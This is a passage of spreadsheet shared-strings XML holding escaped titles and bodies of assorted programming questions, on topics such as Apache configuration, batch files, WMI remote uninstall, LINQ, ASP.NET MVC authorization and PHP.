    <t xml:space="preserve">&lt;p&gt;I have been attempting to create a new directory for my apache server. As I tried to access the new directory, I type:&lt;/p&gt;
&lt;p&gt;sudo /etc/init.d/apache2 restart&lt;/p&gt;
&lt;p&gt;But I obtain this error in the Ubuntu Terminal:&lt;/p&gt;
&lt;p&gt;Syntax Error on line 1 of /etc/apache2/conf.d/fqdn.save:
ServerName takes one argument, the Hostname and port of the server.&lt;/p&gt;
&lt;p&gt;As I investigate, the fqdn.save file could not be accessed and is considered unknown. I want to delete this file, but I'm unable to as I believe I need root access. &lt;/p&gt;
&lt;p&gt;Does anyone know how to delete this unwanted file in Ubuntu? Or does anyone know how to redirect the apache2 restart to /etc/apache2/conf.d/fqdn (instead of fqdn.save) when I type "sudo /etc/init.d/apache restart" on the terminal&lt;/p&gt;
&lt;p&gt;please and thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSCocoa and the iPhone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Now I have a stack of free time on my hands, I wanna get into iphone dev fo real.&lt;/p&gt;
&lt;p&gt;But Objective C scares me (a bit). It feels I'm going a bit back in time. I say this because I've spent the last 8 months coding in C++.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://inexdo.com/JSCocoa" rel="nofollow"&gt;JSCocoa&lt;/a&gt; looks awesome, but does this actually work on the iphone?&lt;/p&gt;
&lt;p&gt;What would need to be done to get this working on the iphone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make some items in a ListBox bold?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Visual c# Express Edition, is it possible to make some (but not all) items in a ListBox  bold? I can't find any sort of option for this in the API.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some good resources for learning Grails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am planning to learn Grails. Which is the best book that I should refer for this? Is there any website available on this for beginners?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>logging for web application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in the middle of building a pretty big site using asp.net (forms if it's of any interest), and I'm wondering if i need a logging framework such as log4net.
I've used such frameworks before, but i don't see how i could put it to any use in this type of project.
usually i think logging is needed for customer delivered application, where the log could be sent back and then analyzed for errors.
what do you think?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>batch file to keep one of ten lines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a file with n lines. (n above 100 millions)&lt;/p&gt;
&lt;p&gt;I want to output a file with only 1 of 10 lines, I can't split the file in ten part and keep only one part, as it must be a little more random. later I have to do a statistical analysis I can't afford to create a strong bias in the data).&lt;/p&gt;
&lt;p&gt;I was thinking of reading the file and for each record if the record number mod 10 then output it.&lt;/p&gt;
&lt;p&gt;The constraints are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;it's a windows (likely hardened) computer possibly XP Vista or Windows server 2003.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;no development tools available&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;no network,usb,cd-rom. read no external communication.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Therefore I was thinking of windows batch file (I can't assume powershell, and vbscript is likely to have been removed). And at the moment looking at the FOR /F command.
Still I am not an expert and I don't know how to achieve this.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Thank you Paul for your answer.
I reformat (with Hosam help) the answer to put it in a batch file:&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@echo off
setlocal   
findstr/N . inputFile| findstr ^[0-9]*0: &amp;gt;temporaryFile
FOR /F "tokens=1,* delims=: " %%i in (temporaryfile) do echo %%j &amp;gt; outputFile
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Thanks quux and Pax for the similar alternative solution. However after a quick test on a larger file Paul's answer is roughly 8 times faster. I guess the evaluation (in SET) is kind of slow, even if the logic seems brilliant.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SecurityException in ASP.net application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web app which queries a Lucene index and it works just fine in a W2K3 server in my network.  Now I got my azure code so I wanted to test the service uploading the app. In order to do that I had to install Vista (I did it in a Virtual machine) cause the Azure SDK won't install on an XP box.&lt;/p&gt;
&lt;p&gt;I created my Cloud Service, added the files from my app but when I run it (just F5) I get a SecurityException, when I call Lucene to query the index, saying:  &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The application attempted to perform
  an operation not allowed by the
  security policy.  To grant this
  application the required permission
  please contact your system
  administrator or change the
  application's trust level in the
  configuration file.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've been googling around and the solutions I've found concern modifying the machine.config file which is something I won't be able to do "in the cloud".&lt;/p&gt;
&lt;p&gt;Could anybody help on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL stored procedure vs. multiple selects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my scenario:&lt;/p&gt;
&lt;p&gt;I've got a table of (let's call them) nodes.  Primary key on each one is simply "node_id".&lt;/p&gt;
&lt;p&gt;I've got a table maintaining a hierarchy of nodes, with only two columns: parent_node_id and child_node_id.&lt;/p&gt;
&lt;p&gt;The hierarchy is maintained in a separate table because nodes can have an N:N relationship.  That is to say, one node can have multiple children, and multiple parents.&lt;/p&gt;
&lt;p&gt;If I start with a node and want to get all of its ancestors (i.e. everything higher up the hierarchy), I could either do several selects, or do it all in one stored procedure.&lt;/p&gt;
&lt;p&gt;Anyone with any practical experience with this question know which one is likely to have the best performance?  I've read things online that recommend both ways.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calculate time period using C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I calculate the time period between 2 dates in C (any library, etc.)? &lt;/p&gt;
&lt;p&gt;The program should take two (local) dates as input and provide the duration period between them as output. &lt;/p&gt;
&lt;p&gt;For example,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;startDate = OCT-09-1976 and endDate = OCT-09-2008 
should show a duration of 32 years. 
startDate = OCT-09-1976 and endDate = DEC-09-2008 
should show a duration of 32 years and 2 months.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WMI invalid Class error (trying to uninstall a software on remote pc)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;All,
      I am trying to uninstall a software remotely, it is working fine in the test machines, but i got problem in production servers. 
test machines i have used windows xp, windows 2003 server,&lt;/p&gt;
&lt;p&gt;production machine : windows server 2003.&lt;/p&gt;
&lt;p&gt;what could be the cause of this error, any help would be more appreciated.
if you have any other way to unistall a software on the remote PC, please share.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void Uninstallwithguid(string targetServer, string product,string guid, string version)
{
		this.Project.Log(Level.Info, "Starting Uninstall " );
	    this.Project.Log(Level.Info, "targetServer :" + targetServer );
		this.Project.Log(Level.Info, "product :" + product );
		this.Project.Log(Level.Info, "guid :" + guid );
		this.Project.Log(Level.Info, "version :" + version );
	    System.Management.ConnectionOptions connoptions = new System.Management.ConnectionOptions();
        connoptions.Impersonation = System.Management.ImpersonationLevel.Impersonate;
        connoptions.Timeout = new TimeSpan(0, 0, 10); // 10 seconds
        System.Management.ManagementScope scope = new System.Management.ManagementScope(@"\\" + targetServer + @"\root\cimv2", connoptions);
        scope.Connect();
        System.Management.ObjectGetOptions objoptions = new System.Management.ObjectGetOptions();
        string test = @"\\" + targetServer + @"\root\cimv2";
        string objPath = string.Format("Win32_Product.IdentifyingNumber='{0}',Name='{1}',Version='{2}'",guid, product, version);
        System.Management.ManagementPath path = new System.Management.ManagementPath(objPath);
        System.Management.ManagementObject moobj = new System.Management.ManagementObject(scope, path, null);
        UInt32 res1 = 0;
		try
		{
        res1 = (UInt32)moobj.InvokeMethod("Uninstall", null);
		}
		catch(Exception ex)
		{
		 this.Project.Log(Level.Error, ex.ToString());
		 throw ex;
		}
		if (res1 != 0)
		{
			this.Project.Log(Level.Error, "Uninstall error " + res1.ToString());
			throw new Exception("Uninstall error " + res1.ToString());
		}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Error Description :&lt;/p&gt;
&lt;p&gt;System.Management.ManagementException: Invalid class 
   at System.Management.ManagementException.ThrowWithExtendedInfo(ManagementStatus errorCode)
   at System.Management.ManagementObject.Initialize(Boolean getObject)
   at System.Management.ManagementObject.get_ClassPath()
   at System.Management.ManagementObject.GetMethodParameters(String methodName, ManagementBaseObject&amp;amp; inParameters, IWbemClassObjectFreeThreaded&amp;amp; inParametersClass, IWbemClassObjectFreeThreaded&amp;amp; outParametersClass)
   at System.Management.ManagementObject.InvokeMethod(String methodName, Object[] args)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to dynamically generate a pdf from Google's appengine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to create an application that would run on Google's appengine.&lt;/p&gt;
&lt;p&gt;However, this application needs to be able to generate PDFs dynamically.&lt;/p&gt;
&lt;p&gt;How could I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Struts 2 &amp; Dojo files are too heavy and affect site's performance.. Any remedies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Well.. we've developed a j2ee application using struts2 ajax capabilities. We find that the dojo implementation is quite slow. We did the following things:
1. Custom build of the dojo library. (increased dojo.js from 240kb to 350kb)
2. Took all the static stuff out of the struts jar and kept it outside.&lt;/p&gt;
&lt;p&gt;The performance was significantly improved. But still it is quite heavy as you can guess with 350kb size..&lt;/p&gt;
&lt;p&gt;Is struts2 ajax supposed to be this heavy? or is there any lighter implementation available?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit: I used Firebug and YSlow with my application. Couple of changes that improved my situation hugely are mentioned below:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Custom build of dojo (reduced the number of I/Os)&lt;/li&gt;
&lt;li&gt;Move the static files out of Struts jar (helped a great deal)&lt;/li&gt;
&lt;li&gt;tune your server to gzip the response (reduced the response size to 1/3)&lt;/li&gt;
&lt;li&gt;Reduce number of images on your site.(this is obvious)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Will keep updating on further changes..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>THotkey with win-key support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyway to get the THotkey component in delphi to support the windows key?&lt;/p&gt;
&lt;p&gt;Or does anyone know of a component that can do this?&lt;/p&gt;
&lt;p&gt;Thanks heaps!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you read input file in Scheme?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to input data from a .txt file into a scheme structure.  Each element is separated by a tab in the data file and each structure set is on a new line.  I want to be able to read in the data from one line into a structure and make a list of each structure set in the file.  Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery Autocomplete: Determining if entered text is not a match</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got jQuery Autocomplete (UI 1.6rc2) up and running fine and when the user picks an item, it updates a hidden form value with the associated ID. How do I set the hidden form value to '0' when the text entered does not match a result from the autocomplete list? In this case, I'll be creating a new entry.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Monitoring a displays state in python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I tell when Windows is changing a monitors power state?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Proper way to scale an SDL Surface without clipping?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;what is the proper way to scale an SDL Surface? I found one explanation online but it required redrawing the Surface pixel by pixel. It seems like there should be some way of doing this natively through SDL rather than redrawing the image like that. I haven't been able to find anything in the SDL documentation that covers this. I am able to resize surfaces without any problem by modifying the surfaces width and height, but the resulting surface is clipped.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>decode a quoted printable message in php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the string which that encoded in &lt;a href="http://en.wikipedia.org/wiki/Quoted_printable" rel="nofollow"&gt;quoted-printable&lt;/a&gt;.  How do I decode this in php?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Vestibulum felis =
pede, vestibulum et, ullamcorper in, ultrices eget, metus. Suspendisse in n=
ulla. Sed justo. Donec dapibus auctor neque. Pellentesque faucibus ante nec=
 metus. Vivamus feugiat, velit rhoncus semper suscipit, libero augue venena=
tis leo, nec ornare nulla elit eget diam. Nullam sollicitudin.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you do a SQL style 'IN' statement in LINQ to Entities (Entity Framework) if Contains isn't supported?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using LINQ to Entities (not LINQ to SQL) and I'm having trouble creating an 'IN' style query.  Here is my query at the moment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var items = db.InventoryItem
                .Include("Kind")
                .Include("PropertyValues")
                .Include("PropertyValues.KindProperty")
                .Where(itm =&amp;gt; valueIds.Contains(itm.ID)).ToList&amp;lt;InventoryItem&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I do this however, the following exception is thrown:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;LINQ to Entities does not recognize the method 'Boolean Contains(Int64)' method, and this method cannot be translated into a store expression.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anyone have a workaround or another solution for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Resolving SVN merge postponed conflicts recursively</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a dev branch that hasn't been touched for a while. I merged the trunk into it to integrate many fixes/changes in the main line since it was branched out, but now I have many small conflicts (merge-left/merge-right).&lt;/p&gt;
&lt;p&gt;I want the latest trunk revision to be used to resolve each conflict. Is there a command I can run that will resolve all conflicts under a working copy in one direction automatically (merge-right should be used for all conflicts)?&lt;/p&gt;
&lt;p&gt;EDIT:
As indicated in the comments, I tried reverting and then running svn merge with the --accept option, only apparently there is no such option in SVN 1.0. Still looking for a solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Visual Studio launch multiple WebDevs when I debug?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Visual Studio 2008 solution with several projects in it - some of which are web applications / sites. &lt;/p&gt;
&lt;p&gt;Whenever I go "Debug &gt; Start new instance" for a specific web application and VS launches the ASP.net Development Server (WebDev.WebServer.EXE) for that application, VS also launches 3 additional such processes - one for each of 3 other web applications I have in the solution.&lt;/p&gt;
&lt;p&gt;How can I tell Visual Studio to only launch WebDev for the one project I'm debugging? I've looked both in the project configurations and in the solution configuration and could not find the relevant setting... &lt;/p&gt;
</t>
  </si>
  <si>
    <t>IDictionary&lt;string, string&gt; versus Dictionary&lt;string, string&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;what is the value of using IDictionary here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Synchronizing databases</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing an Adobe AIR application which stores data locally using a SQLite database.
At any time, I want the end user to synchronize his/her local data to a central MySQL database.&lt;/p&gt;
&lt;p&gt;Any tips, advice for getting this right?
Performance and stability is the key (besides security ;))&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C: the definitive truth about rand, random and arc4random</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's a lot of conflicting information about this topic. So let's try to agree on a definitive answer:&lt;/p&gt;
&lt;p&gt;Which one of these random number generator in C create better randomness: rand, random or arc4random?&lt;/p&gt;
&lt;p&gt;note: Just to make the question clear, this is not a question about true randomness, it's only a clash between those 3.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;As pointed out, this question doesn't make much sense, as this is not about C, but about a specific implementation, in my case, cocoa (more specifically the iphone sdk, but my guess is they are the same as far as these functions go). Still, there's some useful information here. I concluded by implementing arc4random, mostly because of its ease of use (no seeding needed), which is an important factor that no one pointed out.&lt;/p&gt;
&lt;p&gt;I'm closing the question, and adding the cocoa tag for cocoa developers looking for information on RNGs. Many thanks for those who contributed, and sorry for the confusion.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for some good resources to get started with Django</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;All,&lt;/p&gt;
&lt;p&gt;I'd like to check Django out and maybe hack together some web pages to see how it feels - but after having a look at a few tutorials like &lt;a href="http://www.showmedo.com/videos/video?name=stoops010" rel="nofollow"&gt;this one&lt;/a&gt; I am starting to wonder if there is any way of getting it up and runinng without typying cmd line stuff for 1/2 hour.&lt;/p&gt;
&lt;p&gt;Can people point out some good straightforward resources/tutorials to get the thing up and running?  &lt;/p&gt;
&lt;p&gt;I plan doing this on Windows environment.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practice: When to dispatch back to the UI Thread</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question on best pactices.  When is the best time to dispatch a call back to the UI when using a helper loading method like the two below?  Button1 uses the Dispatcher when returned and Button2 allows the helper loading class to encapsulate the call on the Dispatcher.  I tend to favor the Button2.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void Button1_Click(object sender, RoutedEventArgs e)
{
    AsyncLoader.LoadAsyncWithoutDispatcher(delegate(string result)
    {
        this.Dispatcher.Invoke((Action)delegate { this.TextBox1.Text = result; });
    });
}
private void Button2_Click(object sender, RoutedEventArgs e)
{
    AsyncLoader.LoadAsyncWithDispatcher(this.Dispatcher, delegate(string result)
    {
        this.TextBox1.Text = result;
    });
}
class AsyncLoader
{
    public static void LoadAsyncWithoutDispatcher(Action&amp;lt;string&amp;gt; completed)
    {
        var worker = new AsyncClass();
        worker.BeginDoWork(delegate(IAsyncResult result)
        {
            string returnValue = worker.EndDoWork(result);
            completed(returnValue);
        }, null);
    }
    public static void LoadAsyncWithDispatcher(Dispatcher dispatcher, Action&amp;lt;string&amp;gt; completed)
    {
        var worker = new AsyncClass();
        worker.BeginDoWork(delegate(IAsyncResult result)
        {
            string returnValue = worker.EndDoWork(result);
            dispatcher.Invoke(completed, returnValue);
        }, null);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Accessing stored structures for which I have an xml description</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have set up a sort of introspection-enabling C++ library that allows, using minimum macros and a fair amount of template trickery, to declare structures and classes that get enriched with some meta-information.&lt;/p&gt;
&lt;p&gt;This meta-information captures all important details about each field of the struct/class that you declare, and at the end of the story you are able, for each struct/class enriched in this way, to produce an xml file that dumps, for each field, its name,type,len,offset etc. etc.&lt;/p&gt;
&lt;p&gt;For my problem, I don't need to support fields that are pointers, but only primitive types, arrays and STL containers (vectors, lists etc.)&lt;/p&gt;
&lt;p&gt;The code that populates these meta-enriched structs/classes (the "producer"), at a certain point serializes them (for now it's a simple binary dump of all primitive types and of all the "buffers" used by the STL containers, if any).&lt;/p&gt;
&lt;p&gt;Now I need to start developing a "reader" counterpart that is able &lt;strong&gt;at runtime&lt;/strong&gt;, starting from the xml description that has been built by the "producer", to access the various fields of the stored data.&lt;/p&gt;
&lt;p&gt;I think it's a problem of dynamic data-dictionary interpretation, but all that I have found up to know is related to read back xml data, while I have binary data and an xml description of it...&lt;/p&gt;
&lt;p&gt;What is the best way to start on this? Is something out there that resembles this problem and that I could get inspiration from?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>FileNotFound exception when using XmlSerializer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When trying to serialize a type (a generic &lt;code&gt;List&amp;lt;T&amp;gt;&lt;/code&gt; which T is a class marked with XmlRootAttribute) into XML using &lt;code&gt;XmlSerializer&lt;/code&gt;, a &lt;code&gt;FileNotFoundException&lt;/code&gt; is thrown (sometimes) and serialization fails.&lt;/p&gt;
&lt;p&gt;It seems that &lt;code&gt;XmlSerializer&lt;/code&gt; tries to create a temporary file with a random file name in the Temp folder of user under which the application is running, but the file gets deleted somehow.&lt;/p&gt;
&lt;p&gt;Anyone seen this? Any workarounds?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I design the application or model (database) first?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting ready to start building a new web project in my spare time to bring to fruition an idea that has been bouncing around my head for a while.&lt;/p&gt;
&lt;p&gt;I have never gotten down whether I am better off first building the model and then the consuming application or the other way around.&lt;/p&gt;
&lt;p&gt;What are the best practices?  What would you build first and why?&lt;/p&gt;
&lt;p&gt;I imagine that in general the application should generally drive the model, however the application like many websites really doesn't do much without the model.&lt;/p&gt;
&lt;p&gt;For some reason I find it easier at times to think in terms of the model since the application is really just actions on the model. Is this a poor way of thinking about things?&lt;/p&gt;
&lt;p&gt;What advantages/disadvantages does each option have?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UIView bounds with top bar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When creating a UIView with a navigation bar in interface builder, the top bar takes some space, but the view still has the same size.  This mean that the bottom of the view is not visible.&lt;/p&gt;
&lt;p&gt;Is there a way to get the "visible size" of a UIView?  I would like to show a subview at the bottom of the screen, but part of the subview is hidden since the parent view goes "below" the screen.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Singleton heritage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The singleton is explained here:
&lt;a href="http://en.wikipedia.org/wiki/Singleton_pattern#PHP_5" rel="nofollow"&gt;http://en.wikipedia.org/wiki/Singleton_pattern#PHP_5&lt;/a&gt;.
I want to use the singleton class as a superclass, and extend it in other classes that are supposed to be singletons. The problem is, the superclass makes an instance of itself, not the subclass. Any idea how I can make the Superclass create an instance of the Subclass?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; class Singleton {
    // object instance
    private static $instance;
    protected function __construct() { }
    public function __clone() { }
    public function __wakeup() { }
    protected static function getInstance() {
    	if (!self::$instance instanceof self) { 
    		self::$instance = new self;
    		if(self::$instance instanceof Singleton)
    			echo "made Singleton object&amp;lt;br /&amp;gt;";
    		if(self::$instance instanceof Text)
    			echo "made Test object&amp;lt;br /&amp;gt;";
    	}
    	return self::$instance;
    }
}
class Test extends Singleton {
    private static $values=array();
    protected function load(){
    	$this-&amp;gt;values['a-value'] = "test";
    }
    public static function get($arg){
    	if(count(self::getInstance()-&amp;gt;values)===0)
    		self::getInstance()-&amp;gt;load();
    	if(isset(self::getInstance()-&amp;gt;values[$arg]))
    		return self::getInstance()-&amp;gt;values[$arg];
    	return false;
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>MySaifu JVM and BlueCove API on an iPAQ</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Having a bit of an issue running BlueCove on my iPAQ (h5550). I
installed MySaifu JVM and added the BlueCove jar library to the classpath,
but whenever I try to run the tester jar or any other files that reference the
BlueCove API, I get class not found exceptions.&lt;/p&gt;
&lt;p&gt;Anyone had the same issues? I know from the BlueCove documentation
that it's been tested on MySaifu on Windows CE, a name sometimes
(confusingly) used interchangeably with Windows Mobile and Pocket PC,
so maybe it's just a case of compatibility?&lt;/p&gt;
&lt;p&gt;Any help would be appreciated.&lt;/p&gt;
&lt;p&gt;SUMMARY:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Bluecove not working after being added to MySaifu classpath
&lt;ul&gt;
&lt;li&gt;Class not found exceptions&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;iPAQ h5550
&lt;ul&gt;
&lt;li&gt;Windows Mobile 2003 (Pocket PC) &lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do I programatically change options in Access?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;in Microsoft Access, is there a way which I can programatically set the Confirm Action Queries flag on the options screen to False? Ideally when the database is started up I would like to check if it's true, and if so, mark it as false for the currently logged in user.&lt;/p&gt;
&lt;p&gt;The application is locked down reasonably tightly, so ideally, we don't want to have to give users acces to the action menu.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
&lt;p&gt;PG&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you enable [Authorize] for controller but disable it for a single action?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use &lt;code&gt;[Authorize]&lt;/code&gt; for every action in my admin controller except the &lt;code&gt;Login&lt;/code&gt; action. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Authorize (Roles = "Administrator")]
public class AdminController : Controller
{
    // what can I place here to disable authorize?
    public ActionResult Login()
    {
        return View();
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to setup 2 actions with the same name, 1 Authorized and 1 not Authorized?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possble to have something like this in ASP.NET MVC...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Authorize]
[AcceptVerbs(HttpVerbs.Get)]
public string AddData(string Issues, string LabelGUID)
{
    return "Authorized";
}
[AcceptVerbs(HttpVerbs.Get)]
public string AddData()
{
    return "Not Authorized";
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So if the user is not logged in, it defaults to the un-Authorized action.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can any processing be done on the model? [MVC]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've decided to make a big push towards MVC for all new sites I make.  I have a question about whether or not you can have any processing on the model level.&lt;/p&gt;
&lt;p&gt;The case that brought up this question is a video site.  I have a Video class (model) and one of the things I need to do when a user views the video I need the view to be logged in the database.  I'm not sure if I need to add a query in the controller or if I can add a addView method in the Video class.&lt;/p&gt;
&lt;p&gt;The basic underlying question for me is what kind of methods am I limited to in the models?  Can it be anything or does it have to be only accessor (a.k.a getValue/setValue) methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can Silverlight 2.0 pages be removed from a collection manually (garbage collected)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have multiple xaml based pages stored as children of a canvas on another page.  I add and remove the children pages as the application runs.  However, pages that are removed from the children collection are still running and respond to keyboard shortcuts.  How can I force the older pages to be removed completely?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS: Fixed or Float Layout?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My question revolves around CSS Fixed Layout vs a Float Layout that extends to fill the width of the browser.&lt;/p&gt;
&lt;p&gt;Right now the issue I'm running into is to have the masthead resize depending on the width of the page (something that I understand isn't possible given current browser implementation of &lt;a href="http://www.w3.org/TR/2002/WD-css3-background-20020802/" rel="nofollow"&gt;CSS3's &lt;code&gt;background-image: size;&lt;/code&gt;&lt;/a&gt;).  At this point, I feel like I've reached an impasse all around:  Do I rework the site to use a fixed CSS layout, or do I keep the current layout and try to make the masthead image expand to fill most of the space provided?  Moreover, what are the pros and cons of moving to a fixed width layout, and the other (unseen) ramifications of using one layout over another?&lt;/p&gt;
&lt;p&gt;The site in question will be given as a comment to this question -- I don't want to be seen as trying to increase traffic to it.&lt;/p&gt;
&lt;p&gt;Edit: Any other thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how can I draw it using starUml</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using staruml, I find it is hard to draw a perfect UML class diagram when the relation is complex.&lt;a href="http://img360.imageshack.us/my.php?image=serviceloadertw5.jpg" rel="nofollow"&gt;uml diagram&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rationale behind return 0 as default value in C/C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a reason why zero is used as a "default" function return value? I noticed that several functions from the stdlib and almost everywhere else, when not returning a proper number (e.g pow(), strcpy()) or an error (negative numbers), simply return zero.&lt;/p&gt;
&lt;p&gt;I just became curious after seeing several tests performed with negated logic. Very confusing.&lt;/p&gt;
&lt;p&gt;Why not return 1, or 0xff, or any positive number for that matter?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I show a caret (^) in math mode in LaTeX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to display a caret (&lt;code&gt;^&lt;/code&gt;) in math mode in LaTeX to represent the exclusive or operation implemented in the "C languages". By default, &lt;code&gt;^&lt;/code&gt; is for creating a superscript in math mode. The closest I can seem to get is by using &lt;code&gt;\wedge&lt;/code&gt;, which isn't the same.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>List selectors for Objective-C object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an object, and I want to list all the selectors to which it responds. It feels like this should be perfectly possible, but I'm having trouble finding the APIs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem using NSURLRequest to POST data to server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I create an &lt;code&gt;NSURLRequest&lt;/code&gt; to post my data in the iPhone application to a server to proceed the PHP script. My PHP script is look like this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
    $name = $_POST['name'];
    $email = $_POST['email'];
    $link = mysql_connect("localhost", "fffasfdas","Nfdsafafs") or die ("Unable to connect to database.");
